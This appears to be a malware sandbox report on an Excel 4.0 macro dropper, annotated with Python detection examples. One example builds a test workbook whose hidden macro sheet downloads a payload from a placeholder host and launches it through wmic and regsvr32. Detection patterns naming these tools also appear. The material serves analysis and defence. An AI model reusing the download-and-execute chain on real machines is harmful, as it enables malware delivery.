Analysis Report Documents (252).xlsm
Overview
General Information
Detection
Score: | 96 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Startup |
---|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
No yara matches |
---|
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Wmic Launch regsvr32 |
Source: | Author: Joe Security |
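The Sigma hit above is the key detection in this report. As an added example (not the Joe Security rule itself, whose selection logic is not reproduced on this page), the Python below applies equivalent checks to constructed Sysmon-style process-creation records: Office spawning wmic.exe, wmic.exe invoking `process call create` with a regsvr32 payload, and regsvr32.exe appearing under WmiPrvSE.exe. Field names follow Sysmon Event ID 1 (Image, ParentImage, CommandLine); the sample paths and the `stage2.dll` name are assumptions of this example, not values from the sandbox run.

```python
import ntpath
import re

# Parent images that should essentially never spawn wmic.exe on a workstation.
OFFICE_IMAGES = {"excel.exe", "winword.exe", "powerpnt.exe"}
# wmic's process-creation verb; tolerant of extra whitespace and case.
WMI_CREATE = re.compile(r"\bprocess\s+call\s+create\b", re.I)


def _base(path):
    """Case-folded file name; matching on the basename (not the full path)
    keeps both the System32 and the SysWOW64 copy of wmic.exe in scope."""
    return ntpath.basename(path or "").lower()


def evaluate(event):
    """Return the names of every rule the record satisfies (empty if none)."""
    image, parent = _base(event.get("Image")), _base(event.get("ParentImage"))
    cmd = event.get("CommandLine") or ""
    hits = []
    if parent in OFFICE_IMAGES and image == "wmic.exe":
        hits.append("office_spawns_wmic")
    if image == "wmic.exe" and WMI_CREATE.search(cmd) and "regsvr32" in cmd.lower():
        hits.append("wmic_launch_regsvr32")
    # Win32_Process.Create runs the new process under the WMI provider host,
    # so the regsvr32 child surfaces beneath WmiPrvSE.exe, not beneath wmic.exe.
    if image == "regsvr32.exe" and parent == "wmiprvse.exe":
        hits.append("regsvr32_under_wmiprvse")
    return hits


def scan(events):
    """Evaluate each record; returns one list of rule names per record."""
    return [evaluate(e) for e in events]


# Constructed Sysmon Event ID 1 style records, not events from the sandbox run.
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE"'},
    {"Image": r"C:\Windows\SysWOW64\wbem\WMIC.exe",
     "ParentImage": r"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE",
     "CommandLine": r'wmic process call create "regsvr32 /s C:\Users\Public\stage2.dll"'},
    {"Image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": r"regsvr32 /s C:\Users\Public\stage2.dll"},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",   # routine admin use: no hit
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "wmic os get caption"},
]

if __name__ == "__main__":
    for event, hits in zip(SAMPLE_EVENTS, scan(SAMPLE_EVENTS)):
        print(f"{_base(event['Image']):<14} {hits or '-'}")
```

The third rule matters for this sample: because the macro creates its child through WMI, a parent-child rule anchored on EXCEL.EXE or WMIC.exe alone sees no regsvr32 at all; the process appears under WmiPrvSE.exe and has to be correlated back by time and command line. Matching on basenames also covers the SysWOW64 WMIC that 32-bit Office launches in this report.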
Signature Overview |
---|
Each "Source:" row below names the event type that triggered the signature above it; the concrete values (paths, command lines, hostnames, strings) are not preserved in this extract. |
Software Vulnerabilities: |
---|
The section name notwithstanding, the report identifies no software vulnerability or CVE: the three signatures here fire on behaviour of the Excel 4.0 macro sheet described under System Summary (a download through URLDownloadToFile, a blacklisted process start, DNS queries to a low-reputation domain), not on exploitation of Excel itself. |
Document exploit detected (UrlDownloadToFile) |
Source: | Section loaded: |
Document exploit detected (process start blacklist hit) |
Source: | Process created: |
Potential document exploit detected (performs DNS queries with low reputation score) |
Source: | DNS query: |
Source: | DNS query: |
Networking: |
---|
Office document connecting to suspicious TLD (.xyz; the only contacted domain, xherzog24pv.xyz, is listed under Contacted Domains) |
Source: | DNS traffic detected: |
Outdated Microsoft Office dropper detected |
Source: | DNS query: |
Performs DNS queries to domains with low reputation |
Source: | DNS query: |
Source: | DNS traffic detected: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | (152 rows; the matched strings are not preserved in this extract) |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) |
Source: | Screenshot OCR: |
Source: | Screenshot OCR: |
Contains functionality to create processes via WMI |
Found Excel 4.0 Macro with suspicious formulas |
Source: | Initial sample: |
Found abnormal large hidden Excel 4.0 Macro sheet |
Source: | Initial sample: |
A macro sheet whose state is hidden or veryHidden does not appear in Excel's sheet tabs; a veryHidden sheet cannot be unhidden from the Excel UI at all, only from the VBA editor or by editing the workbook XML, which is why XLM droppers favour it. |
Source: | Binary string: |
Source: | Section loaded: |
Source: | Classification label: |
Source: | File created: |
Source: | Mutant created: |
Source: | File created: |
Source: | WMI Queries: |
Source: | File read: |
Source: | Key opened: |
Source: | Process created: |
Source: | Process created: |
Source: | Process created: |
Source: | Process created: |
Source: | Process created: |
Source: | Key value queried: |
Source: | Window detected: |
Source: | Initial sample: |
Source: | Initial sample: |
Source: | Initial sample: |
Source: | Key opened: |
Source: | File opened: |
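The two Excel 4.0 macro signatures above are the core static findings. As an added example (not sandbox code and not the analysed document), the Python below builds a small constructed .xlsm in memory with one visible worksheet and one veryHidden macro sheet, then scans it the way an analyst triages the real sample: enumerate the sheets declared in xl/workbook.xml, resolve which of them are macro sheets through the workbook relationships, and flag hidden macro sheets, their cell counts and any formulas that call commonly abused XLM functions. The formulas in the constructed sheet, the example.invalid URL and stage2.dll path, the suspicious-token list and the 100-cell size threshold are all assumptions of this example.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

NS_MAIN = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
NS_R = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
NS_PKG = "http://schemas.openxmlformats.org/package/2006/relationships"
REL_WORKSHEET = NS_R + "/worksheet"
REL_MACROSHEET = "http://schemas.microsoft.com/office/2006/relationships/xlMacrosheet"

# XLM calls that let a macro sheet download, write or execute code, plus the
# urlmon export named by the sandbox signature. Author's list, not the sandbox's.
SUSPICIOUS_TOKENS = ("EXEC(", "CALL(", "REGISTER(", "FORMULA(", "FOPEN(",
                     "FWRITE(", "URLDOWNLOADTOFILE")
LARGE_SHEET_CELLS = 100  # assumed threshold for "abnormally large"


def build_sample_xlsm() -> bytes:
    """Constructed test document: one visible worksheet and one veryHidden
    Excel 4.0 macro sheet whose formulas mimic a download-then-WMI-launch chain."""
    macro_formulas = [
        'CALL("urlmon","URLDownloadToFileA","JJCCBB",0,'
        '"http://example.invalid/stage2","C:\\Users\\Public\\stage2.dll",0,0)',
        'EXEC("wmic process call create ""regsvr32 /s C:\\Users\\Public\\stage2.dll""")',
        "HALT()",
    ]
    rows = [f'<row r="{i}"><c r="A{i}"><f>{escape(formula)}</f></c></row>'
            for i, formula in enumerate(macro_formulas, start=1)]
    # Numeric filler cells: hidden macro sheets are often padded out to be large.
    rows += [f'<row r="{i}"><c r="B{i}"><v>{i}</v></c></row>' for i in range(4, 204)]
    parts = {
        "xl/workbook.xml": (
            f'<workbook xmlns="{NS_MAIN}" xmlns:r="{NS_R}"><sheets>'
            '<sheet name="Invoice" sheetId="1" r:id="rId1"/>'
            '<sheet name="Macro1" sheetId="2" state="veryHidden" r:id="rId2"/>'
            "</sheets></workbook>"),
        "xl/_rels/workbook.xml.rels": (
            f'<Relationships xmlns="{NS_PKG}">'
            f'<Relationship Id="rId1" Type="{REL_WORKSHEET}" Target="worksheets/sheet1.xml"/>'
            f'<Relationship Id="rId2" Type="{REL_MACROSHEET}" Target="macrosheets/sheet1.xml"/>'
            "</Relationships>"),
        "xl/worksheets/sheet1.xml": f'<worksheet xmlns="{NS_MAIN}"><sheetData/></worksheet>',
        "xl/macrosheets/sheet1.xml": (
            f'<xm:macrosheet xmlns="{NS_MAIN}" '
            'xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main">'
            f"<sheetData>{''.join(rows)}</sheetData></xm:macrosheet>"),
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        for name, xml in parts.items():
            z.writestr(name, xml)
    return buf.getvalue()


def scan_xlsm(data: bytes) -> dict:
    """List every sheet from workbook.xml; for Excel 4.0 macro sheets report
    visibility state, cell count and suspicious formula tokens."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        wb = ET.fromstring(z.read("xl/workbook.xml"))
        rels = ET.fromstring(z.read("xl/_rels/workbook.xml.rels"))
        rel_map = {r.get("Id"): (r.get("Type"), r.get("Target"))
                   for r in rels.iter(f"{{{NS_PKG}}}Relationship")}
        sheets = []
        for sh in wb.iter(f"{{{NS_MAIN}}}sheet"):
            rtype, target = rel_map[sh.get(f"{{{NS_R}}}id")]
            # Targets are relative to xl/ unless written as an absolute part name.
            part = target.lstrip("/") if target.startswith("/") else "xl/" + target
            info = {"name": sh.get("name"), "state": sh.get("state", "visible"),
                    "is_macro": rtype == REL_MACROSHEET, "cells": 0, "suspicious": []}
            if info["is_macro"]:
                root = ET.fromstring(z.read(part))
                info["cells"] = sum(1 for _ in root.iter(f"{{{NS_MAIN}}}c"))
                text = " ".join((f.text or "") for f in root.iter(f"{{{NS_MAIN}}}f")).upper()
                info["suspicious"] = [t for t in SUSPICIOUS_TOKENS if t in text]
            info["large"] = info["cells"] >= LARGE_SHEET_CELLS
            sheets.append(info)
    hidden_macro = [s for s in sheets
                    if s["is_macro"] and s["state"] in ("hidden", "veryHidden")]
    verdict = "suspicious" if any(s["suspicious"] for s in hidden_macro) else "clean"
    return {"sheets": sheets, "hidden_macro_sheets": [s["name"] for s in hidden_macro],
            "verdict": verdict}


if __name__ == "__main__":
    report = scan_xlsm(build_sample_xlsm())
    for s in report["sheets"]:
        print(s)
    print("verdict:", report["verdict"])
```

Real samples usually obfuscate the formulas (CHAR() chains, FORMULA() writing cells at run time), so the token list is a first-pass triage, not a verdict; the hidden-plus-macrosheet combination and an abnormal cell count are the more robust static signals, which is why the sandbox reports them as separate signatures.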
Persistence and Installation Behavior: |
---|
Creates processes via WMI |
A process created through WMI (Win32_Process.Create) is started by the WMI provider host, WmiPrvSE.exe, so in a parent-child process view it is not a child of EXCEL.EXE or WMIC.exe; this is what breaks naive "Office spawned X" detections for this sample. |
Source: | WMI Queries: |
Source: | Process information set: | (65 rows; values not preserved in this extract) |
Source: | Last function: |
Source: | Binary or memory string: |
Source: | Binary or memory string: |
Source: | Binary or memory string: |
Source: | Binary or memory string: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Windows Management Instrumentation21 | DLL Side-Loading1 | Process Injection1 | Masquerading1 | OS Credential Dumping | Security Software Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Non-Application Layer Protocol1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Scripting21 | Boot or Logon Initialization Scripts | DLL Side-Loading1 | Disable or Modify Tools1 | LSASS Memory | File and Directory Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | Exploitation for Client Execution31 | Logon Script (Windows) | Logon Script (Windows) | Process Injection1 | Security Account Manager | System Information Discovery3 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting21 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | DLL Side-Loading1 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |

Only the cells carrying trailing digits were matched; the digits are Joe Sandbox's per-technique signature counters, and every other cell is filler from rendering the full matrix (no credential access, lateral movement, collection or exfiltration was observed). Matched techniques: Execution: Windows Management Instrumentation, Scripting, Exploitation for Client Execution; Persistence: DLL Side-Loading; Privilege Escalation: Process Injection, DLL Side-Loading; Defense Evasion: Masquerading, Disable or Modify Tools, Process Injection, Scripting, DLL Side-Loading; Discovery: Security Software Discovery, File and Directory Discovery, System Information Discovery; Command and Control: Non-Application Layer Protocol, Application Layer Protocol. "Exploitation for Client Execution" is inherited from the "Document exploit detected" signature names, not from an identified vulnerability.
Behavior Graph |
---|
Screenshots |
---|
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
No Antivirus matches |
---|
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
Source | Detection | Scanner | Label |
---|---|---|---|
(domain name not preserved in this extract) | 1% | Virustotal | |
URLs |
---|
Source | Detection | Scanner | Label |
---|---|---|---|
(100 scan rows; URL values not preserved in this extract) | 0% | URL Reputation (93 rows) | safe |
| 0% | Avira URL Cloud (4 rows) | safe |
| 0% | Virustotal (3 rows) | |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
xherzog24pv.xyz | unknown | unknown | true | | unknown |
The only network indicator is a DNS lookup for xherzog24pv.xyz; IP and Active are both unknown and no IP was contacted (see Contacted IPs below), which indicates the name did not resolve in the sandbox and the second stage was never fetched. Every behaviour, dropped file and "No Antivirus matches" result in this report therefore describes the first-stage document only, not the intended payload. |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
(100 entries; URL and source values not preserved in this extract) | | false | | high (72 entries), unknown (28 entries) |
Contacted IPs |
---|
No contacted IP infos |
---|
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 382991 |
Start date: | 07.04.2021 |
Start time: | 02:14:15 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 4m 31s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | Documents (252).xlsm |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Run name: | Potential for more IOCs and behavior |
Number of new started processes analysed: | 32 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal96.troj.expl.evad.winXLSM@5/14@1/0 |
The classification string packs the verdict and score (mal96), the behaviour tags (troj, expl, evad), platform and file type (winXLSM) and, after the @, counts read as processes/dropped files@contacted domains/contacted IPs; 14, 1 and 0 line up with the 14 dropped files, one contacted domain and zero contacted IPs recorded elsewhere in this report. |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
Cookbook Comments: |
Warnings: |
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
02:15:10 | API Interceptor |
Joe Sandbox View / Context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 133170 |
Entropy (8bit): | 5.371008837049652 |
Encrypted: | false |
SSDEEP: | 1536:ZcQIeNquBXA3gBwqpQ9DQW+zAM34ZldpKWXboOilXNErLdME9:5VQ9DQW+zTXiJ |
MD5: | 5DB1A55B07BB8D56FD0EB788248F4D96 |
SHA1: | C2FA81884E6C84D3BDE2D6EC30C034621AD62280 |
SHA-256: | 14D3E8A56B4E76CACE007D18A6BC9159F6385915D7052A14181AD400D7BF95ED |
SHA-512: | C408789701671C045A72AA3D3C44B7D13A75F5AA3D1F446F21909CEAD76F6F9C19DCAD47D2FCF2D76ADCFE9E8465009C30CC03F7EBAC214AD43068941B0573B4 |
Malicious: | false |
Reputation: | low |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1028 |
Entropy (8bit): | 7.761039651897249 |
Encrypted: | false |
SSDEEP: | 24:OZYvitHj0T5rwDxmsYnNk56uCnIw2+ujc:O6vitHQT5rvn1ud+uA |
MD5: | 600F503BC1066BEB5FB5DD494AA1CD74 |
SHA1: | A504D5E687B98F9E0FD2896DFC8492DE0F974BE6 |
SHA-256: | B06BA2FAAAF371AE2F92D9047FFDAAF1933E03CFBC1E999E8B7CF378E33499C3 |
SHA-512: | B7D40CDCD4F442E8941947AF64343D8A06CA8C9710E74BE8E00245C5A67DF574ED243D2B988814843C0AD9483D7058EC355CE087665FFDA5C484CBDF8FD40E40 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 677 |
Entropy (8bit): | 7.433026174405032 |
Encrypted: | false |
SSDEEP: | 12:6v/7RllfMXWaBlhV/Jk6gGPRRKyiaWH/LpR5PTQ6//blm1X+fZ8w5s7nP9Np971x:OZYZnDqkZiaOtnEuA1X+a0sL1L9cLUa6 |
MD5: | 55E8A29B221E51BE421B7D4F5F5F7E52 |
SHA1: | 117E73181FC9CDAA0904C6372D68EE48CEDC14E4 |
SHA-256: | B54D8571DB2F8FC570144F24EF7A42CE93FAB269AF166BF1234DBD2F96D86EB8 |
SHA-512: | 8592A133D815BBC225336F9149A4C89244CBCDEACC958470126DCD266DA8590C587D50D56A7F70771568C4D015BF55642DAAD6434F1C47E8BBBC4AB691694654 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 15644 |
Entropy (8bit): | 7.974497191204788 |
Encrypted: | false |
SSDEEP: | 384:EZRPEsXoz+jRHBbn1+3rhK0XwN8KHpy/c2C9NZ9ff:EZ6sYijj43VK0XwmKJ39Nnf |
MD5: | 29A9EE6FB5591751FC60ECD0FDB9478D |
SHA1: | D8A58D27A5D77416E1B882FDE001FE827EB0C1F5 |
SHA-256: | F2E6BD48ACC89A7DF730F5FE7FD0A19112FEF2C59BFEDF607996B1062337FC8F |
SHA-512: | 5465ABC4330E88D0490B5F61532B990859600F920D4ACA8F4A9013344B478EF51823D37E850ECF67829EEDFB80C00B6324EFE97DD175E56985C1AC07ED890AFE |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1028 |
Entropy (8bit): | 7.761039651897249 |
Encrypted: | false |
SSDEEP: | 24:OZYvitHj0T5rwDxmsYnNk56uCnIw2+ujc:O6vitHQT5rvn1ud+uA |
MD5: | 600F503BC1066BEB5FB5DD494AA1CD74 |
SHA1: | A504D5E687B98F9E0FD2896DFC8492DE0F974BE6 |
SHA-256: | B06BA2FAAAF371AE2F92D9047FFDAAF1933E03CFBC1E999E8B7CF378E33499C3 |
SHA-512: | B7D40CDCD4F442E8941947AF64343D8A06CA8C9710E74BE8E00245C5A67DF574ED243D2B988814843C0AD9483D7058EC355CE087665FFDA5C484CBDF8FD40E40 |
Malicious: | false |
Reputation: | moderate, very likely benign file (byte-identical to the 1028-byte file above: same size, digests and SSDEEP) |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 677 |
Entropy (8bit): | 7.433026174405032 |
Encrypted: | false |
SSDEEP: | 12:6v/7RllfMXWaBlhV/Jk6gGPRRKyiaWH/LpR5PTQ6//blm1X+fZ8w5s7nP9Np971x:OZYZnDqkZiaOtnEuA1X+a0sL1L9cLUa6 |
MD5: | 55E8A29B221E51BE421B7D4F5F5F7E52 |
SHA1: | 117E73181FC9CDAA0904C6372D68EE48CEDC14E4 |
SHA-256: | B54D8571DB2F8FC570144F24EF7A42CE93FAB269AF166BF1234DBD2F96D86EB8 |
SHA-512: | 8592A133D815BBC225336F9149A4C89244CBCDEACC958470126DCD266DA8590C587D50D56A7F70771568C4D015BF55642DAAD6434F1C47E8BBBC4AB691694654 |
Malicious: | false |
Reputation: | moderate, very likely benign file (byte-identical to the 677-byte file above: same size, digests and SSDEEP) |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 15644 |
Entropy (8bit): | 7.974497191204788 |
Encrypted: | false |
SSDEEP: | 384:EZRPEsXoz+jRHBbn1+3rhK0XwN8KHpy/c2C9NZ9ff:EZ6sYijj43VK0XwmKJ39Nnf |
MD5: | 29A9EE6FB5591751FC60ECD0FDB9478D |
SHA1: | D8A58D27A5D77416E1B882FDE001FE827EB0C1F5 |
SHA-256: | F2E6BD48ACC89A7DF730F5FE7FD0A19112FEF2C59BFEDF607996B1062337FC8F |
SHA-512: | 5465ABC4330E88D0490B5F61532B990859600F920D4ACA8F4A9013344B478EF51823D37E850ECF67829EEDFB80C00B6324EFE97DD175E56985C1AC07ED890AFE |
Malicious: | false |
Reputation: | moderate, very likely benign file (byte-identical to the 15644-byte file above: same size, digests and SSDEEP) |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 277688 |
Entropy (8bit): | 7.553565332828095 |
Encrypted: | false |
SSDEEP: | 1536:2OOQStlBQdeequOVllS/2HMBh3DdCG/gsux9R+XkXwGHZEYJtttgBAcBoCwsYijf:2ZllSdosux9RbXwGXJtttYlBJDy2sC |
MD5: | 7F8E2F250B102531058343060B1A85D4 |
SHA1: | DD7A964CB4296F66F817D8ADDD7C98A8CE82E786 |
SHA-256: | E9B1B7DE87303FBBFE2CB786FED20B2A5412BE614FAA6BC346AB4F2473E13818 |
SHA-512: | B2F2350D2358BAF844012C8E8B77F0C9D1554D720BB3CBC6323902F1394ADDE760850F803D72C5DFC26FE9FC3E8B26CF14B65CF5FAE56FA4F0FA43E36FFC8689 |
Malicious: | false |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 904 |
Entropy (8bit): | 4.664611778571911 |
Encrypted: | false |
SSDEEP: | 12:8uXUU+uElPCH2AlA/Ydfge+WrjAZ/2bD8q5LC5Lu4t2Y+xIBjKZm:889lA8AZiD8l87aB6m |
MD5: | 6CE3AFC945BE909FF190D896DD565667 |
SHA1: | DF73D53BE84ABFF95A80CD9D182CF41449C910BE |
SHA-256: | DA6A220EF782C366DA90F0ED03AB3AB55A895E2B14F1442F9278E9081E886111 |
SHA-512: | 42BA2B4B89AECC3B0709E4087489354CA41CBCDE70CA41D0048814FCD206EDC84DCED7E42D1FC4AFD9588FD5C29CF79DF46EC9E9C018D8D1D0F5C65F80257C5E |
Malicious: | false |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 4340 |
Entropy (8bit): | 4.751501502393159 |
Encrypted: | false |
SSDEEP: | 48:8kn74oxXHkB6pkn74oxXHkB6pXn74oxXHkB6pXn74oxXHkB6:8k7b3kKk7b3kK37b3kK37b3k |
MD5: | 45C1EF5A74928CCC6915D627FC86A023 |
SHA1: | ED7A22CEB778A70680BA3D7BE750CA0D8510340B |
SHA-256: | 7097F37386BBDDB323256B0A956516B158499DF099D2E160EFCF45B2A16F9D5C |
SHA-512: | 5D5F9AA38024C247F8991ECD492C5D1E51B85E1399DC5F2088D7B6E143F92E1F3E12D95AB61B9843B311817940B7E84E32B57E66B14A189AE21ACA565D237960 |
Malicious: | true |
Flagged by the sandbox's own heuristics; no antivirus engine matched any dropped file (see Dropped Files above). The SSDEEP value is one chunk repeated four times and the entropy is 4.75, which points to a small, repetitive text-like file rather than a packed binary. |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | modified |
Size (bytes): | 243 |
Entropy (8bit): | 4.67797989421538 |
Encrypted: | false |
SSDEEP: | 6:dj/HXPWEQSGXPWEdHXPWEQSGXPWEdHXPWEQSGXPWEdHXPWEc:dTHZfGZdHZfGZdHZfGZdHZc |
MD5: | D278AEF83499DC4E2D53C88DE6CB4283 |
SHA1: | 54A4A6A577D6B5D06B2911D92C4045AA98C0972B |
SHA-256: | 50A0B13E409E7BA0B55879078E3C1A34A5F509F6DAF4EC7D5A8AB054DAC08440 |
SHA-512: | 37EAFE9906D739177EE86ADF69C63E478D27E4C29F2F547764B4AEA19F4792E6002610200C0204544C6865B64E80A45677B4148D0E64EB5B0685A24990CEAD31 |
Malicious: | false |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 277679 |
Entropy (8bit): | 7.553526172386211 |
Encrypted: | false |
SSDEEP: | 1536:LOOQStlBQdeequOVllS/2HMBh3DdCG/gsux9R+XkXwGHZEYJtttgBAcBoCwsYijn:LZllSdosux9RbXwGXJtttYlBJDy2sS |
MD5: | AD8790A31A98D48645566DBA29BC9371 |
SHA1: | EB5A23745B961BB360C1773D33FB40D96CF3AF79 |
SHA-256: | FDD3B70E991EDB4999AD263C8A83ECAB00072DD5128F011848B2C9687FAAD715 |
SHA-512: | E710D48835E154D4D38C4CE11D16A54D0160DA4406DE7C807C0E89AB4676AF3A423FAA0AB41F6CBDCADF647E80328D2584FFE8BC8D250296B25C21BB561D1ED5 |
Malicious: | false |
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 495 |
Entropy (8bit): | 1.6081032063576088 |
Encrypted: | false |
SSDEEP: | 3:RFXI6dtBhFXI6dtBhFXI6dtt:RJZhJZhJ1 |
MD5: | 28C0C942161F749E335A76E714AACA29 |
SHA1: | 53D07F227E4A2F3AF5373958409A19DE1FA1CF9C |
SHA-256: | BA0AB47EA8285A45E0884C5916C7C3052BE3C5245A0FC350DF4E83B91BC2A3F5 |
SHA-512: | 075F04CF77A30D166E9C04A6376629508A854F9218CEA194EC1D69A65669C51F3A0858697F258AF0DF5954DE02C7EEF2D060B6F69D8194D4D4A95D2C94900DAE |
Malicious: | true |
Flagged by the sandbox's own heuristics; no antivirus engine matched it. Entropy 1.61 over 495 bytes and an SSDEEP made of one chunk repeated three times mean the content is a short pattern repeated, not a payload. |
Process: | C:\Windows\SysWOW64\wbem\WMIC.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 160 |
Entropy (8bit): | 5.095703110114614 |
Encrypted: | false |
SSDEEP: | 3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1MgnRdde6JQAiveyzr:Yw7gJGWMXJXKSOdYiygKkXe/egXeAiv/ |
MD5: | D54D3102F05E6BD2D7AF447501A743FF |
SHA1: | 51BE8488225FE61E01A9AB4112CDB1231C80593B |
SHA-256: | CE9FED99E091E42C390FFBFF36D90A4DEC53BC3DDBAC6494ECCE9894618191B9 |
SHA-512: | 3770AB86E5F7C4784360F59F157AF850F1C84C86DF9EB129FA9E2F61145128404858A16D1F977DD6EB925246367E69232A87DBC87F386D81CC48E2AB77319B34 |
Malicious: | false |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.557820060670911 |
TrID: |
|
File name: | Documents (252).xlsm |
File size: | 210308 |
MD5: | 966c13f10fa0b3bfe75da87bca817396 |
SHA1: | 1769db2ec1d019b526e63637a413ceab10d00ff3 |
SHA256: | 963963dd218deb7e041b5a2ccf85a48c12d62bd2bdc248d6636b332f234cba14 |
SHA512: | e81cd50ab4b16286c51d62baba42170d4403947748d7d3ff4983588f9647b8912aa712fad263e9fd0119be04694d0d4ed8ad68f6d0b9d7b7ce06277e752e46e7 |
SSDEEP: | 1536:0jo+iv69kyln4llllllPtEEEEEEGl464S4A4jJ1rwsYijyKU2p9hYgryA:sLiC97l8Xf1LrDy2iE |
File Content Preview: | PK........E.yR................docProps/PK..........!..X..............docProps/app.xml.SAn.1..#q....'%.P.q.Z..@DJ..k.I,<.e.........,...0..?...$..W......l..ee..B...d8.I.V:... w....$.IX%..P..Dr._.`..<..!f(acA.).1.Q...q.c....J$,........|..&z........u...d.8... |
File Icon |
---|
Icon Hash: | 74ecd0e2f696908c |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "Documents (252).xlsm" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code |
---|
